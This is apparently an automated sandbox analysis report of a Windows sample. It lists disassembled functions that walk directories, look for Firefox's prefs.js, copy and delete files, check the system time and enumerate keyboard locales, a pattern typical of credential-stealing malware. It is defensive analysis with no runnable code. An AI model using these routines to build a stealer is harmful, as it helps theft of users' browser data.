lstrlen.KERNEL32(?), ref: 022B494C
lstrlen.KERNEL32(?), ref: 022B495D

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID:
API String ID: 671575355-0
Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
Instruction ID: 9abbf5da98660769c63fc6eece4e9fb95da42ab9efbf8e19c1502e26fc917ddd
Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
Instruction Fuzzy Hash: 195194B5590218ABCB24EBF0DC98FED737DAF58300F404588E64D92194DB749B84CF92

Function 022B4107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 022B412A
FindFirstFileA.KERNEL32(?,?), ref: 022B4141
StrCmpCA.SHLWAPI(?,00420FAC), ref: 022B416F
StrCmpCA.SHLWAPI(?,00420FB0), ref: 022B4185
FindNextFileA.KERNEL32(000000FF,?), ref: 022B42D3
FindClose.KERNEL32(000000FF), ref: 022B42E8

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
Instruction ID: 7a6934e0bddac05f7ba7e25fc39e7ef97a732df0b2c5f04efa9b8fb1dff86303
Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
Instruction Fuzzy Hash: 615170B6920218BBCB25FBF0DC84EEE737DBF48300F004589A64996044EB75AB85CF95

Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
FindClose.KERNEL32(000000FF), ref: 0040F2C3

Strings

%s\*.*, xrefs: 0040ED32

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
Opcode Fuzzy Hash: aaef0a01aba009eb9ef093bdee74fb80829dc0598d01aa172c0e8bd003938d0c
Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69

Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
FindClose.KERNEL32(000000FF), ref: 0040E3F2

Strings

4@, xrefs: 0040DE32, 0040E400, 0040DEF3, 0040DE75, 0040DEF6
\*.*, xrefs: 0040DE26

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
Opcode Fuzzy Hash: 40323c941dc43f3aa4a48a3986d26ca72e2a529551c594c10e828831c2f82050
Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69

Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
FindClose.KERNEL32(000000FF), ref: 0040FAC3

Strings

prefs.js, xrefs: 0040F812

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
Opcode Fuzzy Hash: f5f4109695479c4be9dbbc3a317f05dd97d159bc4f1a5a6ce1e8ad3b9d7fb5b5
Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A

Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
DeleteFileA.KERNEL32(00000000), ref: 00401DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
FindClose.KERNEL32(000000FF), ref: 00401E32

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Strings

\*.*, xrefs: 004017F1

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
Opcode Fuzzy Hash: 8b97a2c9a29bff876676fca5926e7f77c2165cdbe26687a25fa39450f0f85d83
Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9

Function 022AEF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 022AEFA5
FindFirstFileA.KERNEL32(?,?), ref: 022AEFBC
StrCmpCA.SHLWAPI(?,00421538), ref: 022AF012
StrCmpCA.SHLWAPI(?,0042153C), ref: 022AF028
FindNextFileA.KERNEL32(000000FF,?), ref: 022AF515
FindClose.KERNEL32(000000FF), ref: 022AF52A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID:
API String ID: 180737720-0
Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
Instruction ID: a21d73748e693dad3bc26aae60805a53d9dea4a340c1e8470c69d5f43df8ecc5
Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
Instruction Fuzzy Hash: C4E12E729213189ADB29FBA4CD51EEE733AAF65340F4041D9B10A62499EF346FC9CF50

Function 022ADCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022ADD52
StrCmpCA.SHLWAPI(?,004214B4), ref: 022ADD9A
StrCmpCA.SHLWAPI(?,004214B8), ref: 022ADDB0
FindNextFileA.KERNEL32(000000FF,?), ref: 022AE033
FindClose.KERNEL32(000000FF), ref: 022AE045

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
Instruction ID: daff8f7858c8597d6ab8d82128509c5c54dea8aa6e2407a57f3758c1d15c3541
Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
Instruction Fuzzy Hash: 3F9196729203049BCB15FBF4DD55DEE737AAF99340F00466CE44A96548EF38AB188FA1

Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
FindClose.KERNEL32(000000FF), ref: 0040DDDE

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
Opcode Fuzzy Hash: d1609602d4751f33da9c37f1768f1aa4302fa71f7c98392afc343a762dea85b7
Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A

Function 00416920 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,007478F8,?,0042110C,?,00000000,?), ref: 0041696C
sscanf.NTDLL ref: 00416999
SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,007478F8,?,0042110C), ref: 004169B2
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,007478F8,?,0042110C), ref: 004169C0
ExitProcess.KERNEL32 ref: 004169DA

Strings

B, xrefs: 004169C9
u, xrefs: 0041697E

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID: B$u
API String ID: 2533653975-1063657715
Opcode ID: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
Opcode Fuzzy Hash: c1fc947e1a79b38c7d487adaf1063ec9a4b0ee7c41a6411bb6b711e983b9177c
Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69

Function 022AF917 Relevance: 12.3, APIs: 8, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022AF985
StrCmpCA.SHLWAPI(?,004215BC), ref: 022AF9D6
StrCmpCA.SHLWAPI(?,004215C0), ref: 022AF9EC
FindNextFileA.KERNEL32(000000FF,?), ref: 022AFD18
FindClose.KERNEL32(000000FF), ref: 022AFD2A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
Instruction ID: 38eef91028d9401d68e5c8a886b8e0403566bea1a3211fd0f864f54522c59e0f
Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
Instruction Fuzzy Hash: 19B181719203089BCB25FFE4DDA1EEE737AAF55340F0081A9E40A96558EF356B48CF91

Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF

Strings

@, xrefs: 0040EBF5, 0040E5EB, 0040E71C, 0040E85B, 0040E4B9, 0040E5EE, 0040E71F, 0040E85E
\*.*, xrefs: 0040E44D

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
Opcode Fuzzy Hash: f970a8509302eaf02035adbc7551205bfd23abb47e36f1cf4a831beee27c0276
Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA

Function 022A1937 Relevance: 11.0, APIs: 7, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 022A1B8A
StrCmpCA.SHLWAPI(?,0042526C), ref: 022A1BDA
StrCmpCA.SHLWAPI(?,00425314), ref: 022A1BF0
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022A1FA7
DeleteFileA.KERNEL32(00000000), ref: 022A2031
FindNextFileA.KERNEL32(000000FF,?), ref: 022A2087
FindClose.KERNEL32(000000FF), ref: 022A2099

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID:
API String ID: 1415058207-0
Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
Instruction ID: 80e2f19ba033b14d0eb68a7f733368bce968bf9d415380ebbb0bcecf44431310
Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
Instruction Fuzzy Hash: 9712FF719203189BCB2AFBE4CD95EED737AAF65340F40419DA10A62198EF746F88CF50

Function 022AE077 Relevance: 10.9, APIs: 7, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 022AE0C5
StrCmpCA.SHLWAPI(?,004214C8), ref: 022AE115
StrCmpCA.SHLWAPI(?,004214CC), ref: 022AE12B
FindNextFileA.KERNEL32(000000FF,?), ref: 022AE647
FindClose.KERNEL32(000000FF), ref: 022AE659

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID:
API String ID: 2325840235-0
Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
Instruction ID: 942f73b729bd83272e5b7ef0bf7ba6938431d54ba8052632c1e5c107f774da08
Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
Instruction Fuzzy Hash: F9F1C0715203189BCB2AFBA4DD95EEE733ABF25340F4041DAA15A62158EF346F89CF50

Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
LocalFree.KERNEL32(00000000), ref: 00417D22

Strings

/ , xrefs: 00417C7F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
Opcode Fuzzy Hash: e5c57c6c764d32f02f1601ebf7bf93b63245a0d7122093c1d099e751a5e50907
